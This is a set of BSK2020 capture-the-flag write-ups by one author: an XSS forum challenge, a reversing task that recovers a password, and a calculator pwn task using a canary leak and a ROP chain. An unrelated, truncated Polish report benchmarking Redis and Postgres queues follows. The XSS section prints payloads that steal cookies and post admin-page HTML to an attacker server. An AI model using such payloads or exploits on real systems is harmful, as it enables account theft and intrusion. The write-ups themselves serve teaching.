BSK2020 - Lorak_ Web task In this task, we are provided with url: This site allows is some kind of forum - it lets us create threads, and then post messages in them. We can also report the thread to admin - which is a pretty strong hint that this is a XSS challenge. Thread creation: Thread with 2 messages: Message length is very limited. There is info on main page: "Posts are strictly limited to 13 characters (and that includes HTML formatting automatically added by the editor)". Messages are sent using POST requests. Body of request is in format content=contents_of_message. The editor wraps our message in HTML

tags, so message test will be sent as


. This is something that immediately seems like a great place for XSS. And indeed, changing payload to content=. Sending those 3 messages results in expected alert. After reserving 4 characters for closing and opening comment we are left with 9 chars of js per message, which is enough to execute pretty much arbitrary code. To make my life easier, I prepared small snippet which dynamically added Now, all that's left is to find the flag. First attempt was of coure stealing admin cookies with payload such as: fetch('' + btoa(document.cookie)). But unfortunately, admin has no cookies (or at least no cookies without httpOnly flag). Request from admin, as you can see data parameter is empty: To get the flag, we must first notice the existence of /admin_panel endpoint. There are at least 2 ways to do that: If you look at Referer header in bot's request, it points to that exact endpoint. Scan the site with tool like, the default list can locate this url. Ok, so we probably need contents of /admin_panel. If we look at headers of response from any endpoint, we can see that X-Frame-Options header is set to SAMEORIGIN - which means we can almost surely load /admin_panel in iframe and access it's content. Payload that extracts /admin_panel and sends content to my server: function prepareFrame() { var iframe = document.createElement("iframe"); iframe.setAttribute("src", "/admin_panel"); iframe.onload = function() { console.log(iframe.contentWindow.document.documentElement.outerHTML); fetch('', {method: 'POST', body: btoa(iframe.contentWindow.document.documentElement.outerHTML)}); }; document.body.appendChild(iframe); } prepareFrame(); As expected, admin sent us request with pretty long payload: Decoding that base64 payload gives us html code: Uncommunicative people forum



Thread to be reviewed:

No posts.
Flag: FLAG{2bb0e8357ffff1596a8a2970ab8dbb192bee0dd6}Reversing task Author: Karol Baryła (kb406092) Let's start with analyzing the program in ghidra. First thing to notice is that program reads 0x128 bytes from provided file, and only continues if it succeeds. This, and the way those bytes are accessed later, tells that those 0x128 bytes are a struct, some kind of file header. Upon further inspection of the code, this structure can be deduced to look like this: struct __attribute__((__packed__)) header_struct { uint32_t MAGIC_NUMBER; uint32_t file_length; char original_filename[256]; char encrypted_password[32]; }; header_struct.MAGIC_NUMBER determines if file is encrypted using easy or hard algorithm. After that, there are few more things happening before decrypting file contents - let's leave those for later, and see how decryption is performed. Encrypted file is read, 4 bytes at a time, those 4 bytes (interpreted as 32bit int), are passed to decryption function (which one, easy or hard, is determined by magic number), function returns decrypted int, and it is written to decrypted file. Code looks like this (in Ghidra): i = 0; if (file_header.file_length != 0) { do { read_chars = fread(&local_17c,4,1,encrypted_file); if (read_chars != 1) { perror("fread"); LAB_00100e88: retval = 1; goto LAB_00100d69; } if (file_header.MAGIC_NUMBER == 0xb542020) { local_17c = decrypt_easy(local_17c); } else { local_17c = func_0x001030b0(local_17c); } remaining = file_header.file_length - i; if (4 < remaining) { remaining = 4; } read_chars = fwrite(&local_17c,(long)remaining,1,decrypted_file); if (read_chars != 1) { perror("fwrite"); goto LAB_00100e88; } i = i + 4; } while (i < file_header.file_length); } where func_0x001030b0 is hard decryption function. Now we know how decryption functions are used, let's go trough rest of this function. First, program iterates trough part of memory, and decrypts it using easy decryption function. target_value = (uint *)0x103254; next_ptr = (uint32_t *)0x1030b0; do { i = *next_ptr; next_ptr = next_ptr + 1; i = decrypt_easy(i); next_ptr[-1] = i; } while (next_ptr != target_value); Decoded region contains 2 functions, hard decryption function, and one other - not important for now (let's call it strange_function). We can get decoded bytes easily - set breakpoint in gdb after decryption is complete, dump decrypted bytes to file. Getting Ghidra to analyze it is more tricky - byte view allows replacing single bytes, and should allow to replace byte range, but there were some errors no matter what I did. Fortunately, there is a way around it - let's automate inserting those bytes from keyboard - Ghidra doesn't have problem with that. After copying hexlified bytes, use this command: sh -c 'sleep 10; xdotool type "$(xclip -o -selection clipboard)"'. It waits 10 seconds, and then simulates typing clipboard content on keyboard. Now, we have decrypted code in Ghidra, let's look briefly into decryption functions. Code of decrypt_easy: uint decrypt_easy(uint param_1) { uint uVar1; uint uVar2; uVar2 = param_1 ^ decrypt_buffer[0]; uVar1 = decrypt_buffer[2] * 0x2137 + uVar2; decrypt_buffer[0] = decrypt_buffer[1]; decrypt_buffer[1] = decrypt_buffer[2]; decrypt_buffer[2] = decrypt_buffer[3]; decrypt_buffer[3] = uVar1 >> 6 | uVar1 * 0x4000000; return uVar2; } It uses some global buffer (as some king of cyclic buffer), and does some operations on it - it's not really important what exaclty it does. The important part is: output depends on input and contents of this buffer, and this buffer is modified during call. decrypt_hard is similiar, just as bit more complicated. uint decrypt_hard(uint param_1) { uint uVar1; uint uVar2; uVar2 = param_1 ^ decrypt_buffer[0]; uVar1 = decrypt_buffer[2] * 0x2137 + uVar2; decrypt_buffer[0] = decrypt_buffer[2] * 0x7a69 + decrypt_buffer[1]; decrypt_buffer[1] = decrypt_buffer[2]; decrypt_buffer[2] = decrypt_buffer[2] * 0x1234567 + decrypt_buffer[3]; decrypt_buffer[3] = uVar1 >> 6 | uVar1 * 0x4000000; return uVar2; } There are 2 more things happening in main function. Buffer is modified, and strange_function is called: decrypt_buffer[0] = getpid(); decrypt_buffer[1] = getppid(); strange_function(&file_header); Password is processed. It is unhexlified, and written to different location. The tricky part is, the bytes are not saved just to some buffer, but also to other addresses, which can be hard to notice in default decompilation: password_fragment = *__s; __isoc99_sscanf(password_fragment,"%x",unhexlified_pass_buffer + 4); password_fragment = __s[1]; __isoc99_sscanf(password_fragment,"%x",unhexlified_pass_buffer + 3); password_fragment = __s[2]; __isoc99_sscanf(password_fragment,"%x",0x1030d7); password_fragment = __s[3]; __isoc99_sscanf(password_fragment,"%x",0x1030bd); password_fragment = __s[4]; __isoc99_sscanf(password_fragment,"%x",unhexlified_pass_buffer + 2); password_fragment = __s[5]; __isoc99_sscanf(password_fragment,"%x",0x1030dc); password_fragment = __s[6]; __isoc99_sscanf(password_fragment,"%x",unhexlified_pass_buffer + 1); password_fragment = __s[7]; __isoc99_sscanf(password_fragment,"%x",unhexlified_pass_buffer); These addresses are located in decrypt_hard, in fact they correspond with constants found in decrypt_hard's code - so those constants will be replaced with parts of password. After that, unhexlified password is "decrypted" (in this case we should probably say encrypted?) using decrypt_easy, and compared with a field from header (if they are equal, password is correct). global_pwd = password_global; password_global[0] = decrypt_easy(unhexlified_pass_buffer[4]); password_global[1] = decrypt_easy(unhexlified_pass_buffer[3]); password_global[2] = decrypt_easy(0x2137); password_global[3] = decrypt_easy(0x7a69); password_global[4] = decrypt_easy(unhexlified_pass_buffer[2]); password_global[5] = decrypt_easy(0x1234567); password_global[6] = decrypt_easy(unhexlified_pass_buffer[1]); password_global[7] = decrypt_easy(unhexlified_pass_buffer[0]); retval = memcmp(file_header.encrypted_password,global_pwd,0x20); The way Ghidra decompiles this code is very confusing, and in my opinion incorrect - it shows that numeric literals are passed to decrypt_easy, but in fact it uses values under addresses (and the addresses are in writeable part of memory, so no idea why it shows literals): 00100c14 8b 3d a3 MOV phVar1,dword ptr [LAB_001030bc+1] 24 00 00 00100c1a 89 05 68 MOV dword ptr [password_global[2]],read_chars = null 26 00 00 00100c20 e8 db 03 CALL decrypt_easy uint decrypt_easy(uint param_1) 00 00 The point is, constants in decrypt_hard are modified, so they are more like variables, and we need to account for this while recreating program. That's pretty much all that we need to know, to create source of program (we didn't look at strange_function yet, but it's not important how it works). Let's copy all code to .c file, fix compilation errors, and remember that we need to perform decryption of the code, because it modifies the buffer. The result is code that works as original (+ prints some debug info). Link to code Now we can work with this source, binary is no longer relevant. Let's clean up and simplify this code. Apart from typical cleanup, there is one thing we can do to eliminate some code. Decryption of encrypted functions is unnecessary - we don't use the result, but still need the procedure, because it modifies the encryption buffer. So let's print the buffer after decryption, and use it as starting buffer, then we can skip this whole thing. Link to cleaned up code. Now let's see what is strange_function and how to simplify it. Internally it uses a function I called push_data_to_buffer, defined as follows: void push_data_to_buffer(uint32_t param_1){ uint32_t retval = param_1 ^ decrypt_queue[0]; decrypt_queue[0] = decrypt_queue[1]; decrypt_queue[1] = decrypt_queue[2]; decrypt_queue[2] = decrypt_queue[3]; decrypt_queue[3] = retval >> 6 | retval << 0x1a; return; } It treats decrypt_queue (this name is not really good) as cyclic buffer. Operations here are pretty simple. Binary first sets 2 elements of this buffer, then call strange_function: decrypt_buffer[0] = getpid(); decrypt_buffer[1] = getppid(); strange_function(&file_header); strange_function first uses push_data_to_buffer 64 times - on each 4 bytes of original_filename field of header struct. Then it opens /proc/file/stat, and searches for fields ending with Pid - which will be Pid, PPid, TracerPid. It seems to be some form of anti-debugging - if TracerPid is different from 0, decryption will fail. The interesting part is: pid() and ppid() will give different results every run. Why anything works here? It is caused by how push_data_to_buffer works. If buffer[0] = x, then it is called 64 times, let's say with paramn_1 = 0 for simplicity, then again buffer[0] = x (buffer will cycle 64 / 4 = 16 times, so x will be periodically bit-shifted by 6 * 16 = 96 bits, which is a multiply of 32). So the Pid and PPid fields will zero out with values from /proc/self/status. Which means we can use any values insted of pid() and ppid() as long as we call push_data_to_buffer again with same values after 64 calls. That means we can simplify it a bit. Let's delete pid() and ppid() calls, set first 2 elements of buffer to 0's and change strange_function to this: void strange_function(struct header_struct* header) { char* orig_filename = header->original_filename; char* enc_password = header->encrypted_password; do { push_data_to_buffer(*(uint32_t *)orig_filename); orig_filename += 4; } while (orig_filename != enc_password); for(int i = 0; i < 3; i++) { push_data_to_buffer(0); } } Yay, everything still works. Only thing that's left is to add decrypting without password. There is nothing problematic about it - it is a simple xor. Earlier we saw, that return value of decrypt_easy is argument xored with first element of buffer. And we know that "decrypted" password has to be equal to specific field in file header. So, goal is: decrypt_easy(unhexlified_pass_buffer[i]) == (int*)file_header.encrypted_password[i] . So, for index 0 we have: decrypt_queue[0] ^ unhexlified_pass_buffer[i] == (int*)file_header.encrypted_password[0]. Well, we know decrypt_queue and file_header.encrypted_password, so we can easily decrypt password: for(int i = 0; i < 8; i++) { // Password cracking - originally there was a sscanf that unhexlified entered password unhexlified_pass_buffer[i] = ((int*)file_header.encrypted_password)[i] ^ decrypt_queue[0]; password_processed[i] = decrypt_easy(unhexlified_pass_buffer[i]); } Link to final codePwn task Author: Karol Baryła There are 2 main bugs in the code that can be used together to exploit it. There is no bounds checking when accessing stack_token and stack_value - so we can easily cause buffer overflow with the right expression, e.g. one that begins with '(' * 32. When parsing ) character, there is no check if stack_token[sp-1] == TOKEN_VALUE - which makes it possible to read memory we shouldn't be able to, by doing something like (+) - parsing of + character won't trigger write to stack_value[sp], but parsing ) will read this field, and copy it to previous one - while at the same time setting stack_token[sp-2] to TOKEN_VAL. Combining those 2 bugs, we can e.g. create payload that reads canary from stack: ((((((((((((((((((((((((((((((((+)))))))))))))))))))))))))))))))). Output values are always 64-bit floating point values, but we can get back original value using Python's struct module: >>> struct.pack('d', -2.39820918180181417655e-39) b'\x00\xb1\xbbB;\x1d\xea\xb7' >>> hex(struct.unpack('Q', b'\x00\xb1\xbbB;\x1d\xea\xb7')[0]) '0xb7ea1d3b42bbb100' The only problem with payload like presented earlier, is that reading some value from stack also copies it to every field between between start of stack_value and original location. The way to fix it, is to write back the right values back after reading what we want. We can do it by pushing read value few slots down, going back up to the broken values, and writing them using proper combination of )'s, +'s and values. Example: First, let's read value immediately after buffer and save it to variable a: a=(((((((((((((((((((((((((((((((+))))))))))))))))))))))))))))))). Then, to read next value from stack, while preserving previous one, we can use payload like this: b=((((((((((((((((((((((((((((((((+))))))))+0*(0+a))))))))))))))))))))))))). How it works: we push new value 8 slots down using 8x). Then, we go 6 slots up, using +0*(0+, then write a's value to proper slot - the one below original location of b. If we need to fix more entries, it is very similiar: c=(((((((((((((((((((((((((((((((((+)))))))))+0*((0+b)+a))))))))))))))))))))))))). After each written entry we go 2 slots down, and then one up, to write next entry. We have everything we need, let's hack the program. The battle plan is to read some values from the stack in order to get libc's and binary's addresses. When we know addresses, we can create simple ROP to execute system('/bin/sh'). This ROP will consist of 3 elements - pop rdi, then address of '/bin/sh' string in libc, and then address of system(). After a few hours of debugging, I got a working script. LINK TO SCIRIPT And the flag from server: BSK{s3Nd-r3cV-f1X-5enD-h4X} Now let's move on to "harder" version. The only difference is that it quits after executing expression that doesn't assign to variable. This effectively prohibits reading any contents of memory. This is a problem for our script, because we now have no way of leaking addresses back to us, so no way of calculating addresses needed for ROP. The solution is pretty simple - the binary is a calculator, let's make it calculate everything for us. This would be impossible in general case - this calculator performs operations on doubles, we want to perform operations on representations of those doubles, treated as unsigned 64 bit ints. Turns out - that's not a problem here, thank's to how doubles are represented in memory. 12 high bits are sign bit and exponent - those will always be 0 in our case, because we operate on addresses, and in Linux those will always have 16 high bits cleared (or set to 1's, but that's not something we need to worry about here - I think it's only possible in kernel). So, if the sign bit and exponent are 0's, addition of 2 doubles is equal to addition of their representations (if the addition itself doesn't change exponent). a * 2^-1023 + b * 2^-1023 = (a+b) * 2^-1023. Well, that's all we need, let's modify exploit. LINK TO SCIRIPT And the flag from server: BSK{0n35hoT-w1Th-d3n0rM4l-f1o4Tz} Bonus: "beautiful" GDB script that was very helpful while debugging my exploitsNew Page Autor: Karol Baryła (kb406092) Kod używany w zadaniu dostępny w repozytorium: ZBD - Zadanie 4 - system wyświetlania reklam Platforma testowa CPU: AMD Ryzen 9 3900 12 rdzeni, 24 wątki, 3.1GHz RAM: 64GB (2x32GB) 3200Mhz SSD: 1 TB M.2 Samsung 970 PRO | PCIe 3.0 x4 | NVMe (odczyt ~3.5GB/s, czas dostępu ~0.04ms) Opis rozwiązań Redis Proces 1 generuje nowe zapytanie identyfikowane poprzez UUID. Umieszcza w bazie pod kluczem request- hashmapę postaci {'client_id': losowe uuid, 'ip': losowe ip, 'time_1': aktualny czas}. Następnie dodaje informację o tym zapytaniu do dwóch kolejek, po jednej dla procesów typu 2 i 3. Kolejki te realizowane są poprzez listę, więc proces 1 wykonuje komendę RPUSH nazwa_kolejki 'request-'. Następnie powtarza wszystko od początku. Procesy 2 oraz 3 używają komendy BLPOP do pobierania zapytań z kolejki. Jest to blokująca wersja instrukcji LPOP - jeśli lista z której chcemy pobrać element jest pusta, zapytanie blokuje do czasu aż coś się w niej pojawi. Gdy pojawi się nowy element, budzony jest klient oczekujący najdłużej. Według dokumentacji Redisa BLMOVE jest zalecanym sposobem implementacji kolejek - jednak nie musimy się tutaj przejmować awariami procesów, więc BLPOP jest wystarczające. Proces 2 pobiera element z kolejki, następnie czyta z odpowiadającej hashmapy identyfikator klienta. Na podstawie identyfikatora losuje nazwę kraju i zapisuje ją do tej samej hashmapy pod kluczem 'country'. Jest to uproszczona wersja generowania dodatkowych informacji o zapytaniu - co miał robić ten proces. Po zapisaniu tych danych, wrzuca informację do osobnej kolejki, na którą czeka proces 3. Proces 3 pobiera zapytanie z kolejki (podobnie jak proces 2). Następnie, w 50% przypadków od razu zapisuje do hashmapy zapytania informację o wyświetleniu reklamy oraz bieżący czas. W pozostałych 50% najpierw czeka aż proces 2 skończy przetwarzanie (czeka na odpowiednią kolejkę, która w sumie nie jest kolejką a bardziej.. semaforem? barierą? zmienną warunkową? chyba semafor najlepiej pasuje), następnie z szansą 50% zapisuje do bazy informację o wyświetleniu reklamy. Postgres Całość działa niemal identycznie jak w przypadku redisa - oczywiście uzywamy postgresa zamiast redisa, więc dane są trzymane nieco inaczej. Mamy tabelkę na zapytania (z kolumnami odpowiadającymi kluczom w hashmapie w redisie, czyli request_id, client_id, ip, country, time_1, time_2, time_3, type), oraz 2 tabelki na kolejki (kolumny to request_id i status, tzn czy już zajęte). Do tego jest ustawione wysłanie powiadomienia na odpowiednim kanale przy insercie do kolejki. Próba pobrania elementu z kolejki wygląda tak: UPDATE queue_2 SET status='taken' WHERE request_id IN ( SELECT request_id FROM queue_2 WHERE status='new' LIMIT 1 FOR NO KEY UPDATE SKIP LOCKED ) RETURNING request_id; Powiadomienia odbieramy natychmiastowo w procesach 2 i 3 z pomocą select, tak jak opisano w dokumentacji: Metodologia testowa Opóźnienie mierzymy jako różnicę czasów zapisanych przez procesy 3 i 1. Testy przeprowadziłem w dwóch scenariuszach: bez ograniczeń zasobów, oraz z ograniczeniami zasobów (1 CPU, 0.5GB RAM) poprzez odpowiednie flagi do dockera (--cpus=1 --memory=512m). Każdy test trwa 5 sekund. We wszystkich wykresach oś X oznacza czas wysłania zapytania (czyli czas zapisany przez proces 1), a oś Y czas odpowiedzi na zapytanie (czas 3 - czas 1). Jednostki na obu osiach to milisekundy. Wartość SLA 95% = X oznacza, że 95% zapytań zostało obsłużonych w czasie X lub szybszym. Redis Pub/Sub Sporo czasu poświęciłem na użycie mechanizmu pub/sub do przesyłania informacji od procesu 2 do 3 o zakończeniu przetwarzania. Mechanizm ten okazał się jednak zbyt zawodny - pojawiały się sytuację, gdzie proces odbierający tracił komunikat - co było problematyczne, bo się wieszał i nic nie działało. Próbowałem naprawiać to na różne sposoby - nawet odbierać wiadomości w dedykowanym wątku, by robić to cały czas - bezskutecznie. Przykładowy wykres z takiej sytuacji: Handled 6878 of 54236 results (12.68%) SLA for Immediately send ad 95%: 3.49 ms, 99%: 4.12 ms, 99.9%: 4.67 ms SLA for Send ad after processing 95%: 3.66 ms, 99%: 4.55 ms, 99.9%: 4.82 ms Musiałem przerobić komunikację 2->3 na podobną do tej jak 1->2 i 1->3. Proces 2 wykonuje RPUSH finished-, a 3 robi BLPOP finished-. Powoduje to dużo porzuconych kluczy - gdy 3 nie czeka na wynik z 2, w realnej aplikacji trzebaby je jakoś sprzątać. Testy Zacznijmy od redisa bez ograniczeń sprzętowych. Przy odpaleniu po 1 procesie każdego typu dostajemy następujące wyniki: